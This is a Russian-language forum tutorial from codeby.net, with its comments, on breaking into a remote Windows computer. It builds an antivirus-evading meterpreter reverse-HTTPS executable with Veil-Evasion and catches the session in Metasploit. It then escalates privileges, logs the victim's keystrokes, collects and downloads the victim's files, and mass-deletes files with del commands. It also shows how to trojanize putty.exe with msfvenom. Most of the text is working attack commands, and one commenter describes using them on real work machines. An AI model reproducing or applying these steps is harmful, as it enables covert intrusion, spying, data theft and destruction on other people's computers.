• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:
W

woweb

В общем ситуация та же...одна и таже хрень...вот скрины
Выделение_006.png Выделение_006.png Выделение_007.png
Видимо программа встало криво...
Но хп то ломает если не sp3 что за куйня не пойму
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Я вот понять не могу, файл с пайлоадом .exe генерируется или нет?
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Нашел у кого спросить...если б я знал...но судя по скрину голимые ошибки
вот посмотриПосмотреть вложение 7362
По этому скрину, я вижу, что не установлен Python и траблы с Wine. Я в переписке очень долго буду обьяснять как это пофиксить, очень долго... Поэтому предлагаю отложить связку Veil+Python+Wine пока в сторону, и взглянуть сюда - https://codeby.net/threads/vzlom-udalennogo-xosta-smb-delivery-exploit.58361/ Этот способ попроще будет
 
W

woweb

Тем способом тоже пробывал...все что тут есть на сайте способы испробывал...ничего кроме хп не ломается, может у меня система левая, стоит kali linux обновил вчера дистанционно

Судя по скрину питон и все приблуды установлены! Выделение_008.png
 
Последнее редактирование:
W

woweb

Щас только осенило...а ведь в мануале вооще не упоминается комп жертвы. ни ее айпи...только атакующая машина...получается что мануалу я сам себя пытаюсь атаковать...
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Тем способом тоже пробывал...все что тут есть на сайте способы испробывал...ничего кроме хп не ломается, может у меня система левая, стоит kali linux обновил вчера дистанционно

Судя по скрину питон и все приблуды установлены!Посмотреть вложение 7363
Хм, верно. А как Veil устанавливался? С Гитхаб? Кали на виртуалке или на реальной машине?
 
W

woweb

Все машины реальные...все в реальной сетке, просто атакующий комп и атакуемый не так важны, поэтому я на них и тренируюсь...
Делал не один раз все пошагово и копировал и вводил команды в ручную...резулатат один и тот же...либо это работает на вирт машинах а в жизне бесполезно...либо никак.
Вейл устанавливался во твой мануалке...все хорошо прошло без ошибок...пока не вылез ебущий экран...что что то не так...и сцука...эти ошибки вылазят всегда чтобы я не делал...все мануалы что тут есть перепробывал...нихрена...в реальной сетке не работает...хп ломает без проблем...только нахер кому они нужны...кто на них сейчас сидит...только долбанутые на всю голову юзьвери!
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Это работает независимо виртуальная машина или нет. Подвержены как 7-ка так и 8-ка, только с 10-кой немного сложнее, там UAC забористей.
 
W

woweb

Не знаю...что делать...все как написано ничего не упустил...и в итоге такая шляпа...а можешь зайти через тим вивер и посмотреть что за куета такая выходит...
 
W

woweb

А в понедельник днем...вечером я уже не на работе...а свою домашню машину жалко отдавать на расстерзание.
А завтра у нас выходной...какой-то праздник...хп пойми что за праздник...
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
А в понедельник днем...вечером я уже не на работе...а свою домашню машину жалко отдавать на расстерзание.
А завтра у нас выходной...какой-то праздник...хп пойми что за праздник...
Поставь на виртуалку что-нибудь
 
W

woweb

Ну на виртуалке можно ломать до потери пульса...а в реале мне нужно работать с рабочими машинами
 
W

woweb

Если честно закралось поздорение что тут разводят...
В наши то дни да бесплатный "сыр" по взлому...конечно такого не бывает...
готов заплатить реальному хареку за обучение, только если он докажет что умеет делать реально а не вских виртуалках
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Если честно закралось поздорение что тут разводят...
В наши то дни да бесплатный "сыр" по взлому...конечно такого не бывает...
готов заплатить реальному хареку за обучение, только если он докажет что умеет делать реально а не вских виртуалках
Конечно не бывает:D
 
  • Нравится
Реакции: -=S_U_N_Y=-
W

woweb

Конечно не бывает:D
Ну вот сразу нельзя было сказать, а ведь кучу народу здесь сидит и понять не может почему не так...а ответ прост...сцука здесь толко виртуалки ломают...спецы бляд...уже двое суток никто не смог ни объяснить ни выявить причину...
Только и слышишь...а ты скрины покажи...бля на смотри...показал...ан нет...еще нужно...бля держи еще скринов...в итоге да...все вроде правильно...а поробуй присесть пять раз...а попробуй перезагрузить...
Тут есть вообще люди кто реально может ответить адекватно и разобрать ошибки...ведь на скринах они видны, пока у кого спрашивал оказались не умнее меня...ну может процентов так на пять...

Ненормативная лексика запрещена правилами. Ваш аккаунт временно заблокирован.
WebWare Team
 
Последнее редактирование модератором:

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 351
BIT
0
Ну вот сразу нельзя было сказать, а ведь кучу народу здесь сидит и понять не может почему не так...а ответ прост...сцука здесь толко виртуалки ломают...спецы бляд...уже двое суток никто не смог ни объяснить ни выявить причину...
Только и слышишь...а ты скрины покажи...бля на смотри...показал...ан нет...еще нужно...бля держи еще скринов...в итоге да...все вроде правильно...а поробуй присесть пять раз...а попробуй перезагрузить...
Тут есть вообще люди кто реально может ответить адекватно и разобрать ошибки...ведь на скринах они видны, пока у кого спрашивал оказались не умнее меня...ну может процентов так на пять...
Я устал тебе уже обьяснять... Советую, перед тем как начать что-то использовать из вышеизложенного, хотя бы выучить английский, для анализа своих ошибок. Прочитать основы, видно, что Дебиан тебе так и не дался. Затем потихоньку пробовать, потихоньку... не нервничая, начинать что то применять на практике. А не бросаться необоснованной критикой и эмоциями. Те, кто соображают, почерпнут из этого полезную инфу. А персонажи подобные тебе, так и будут кидаться дерьмом, с требованиями научить\показать\взломать. Не трать время понапрасну, моя тебе рекомендация, читай книги лучше.
 
  • Нравится
Реакции: kokorionk и RACOON
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!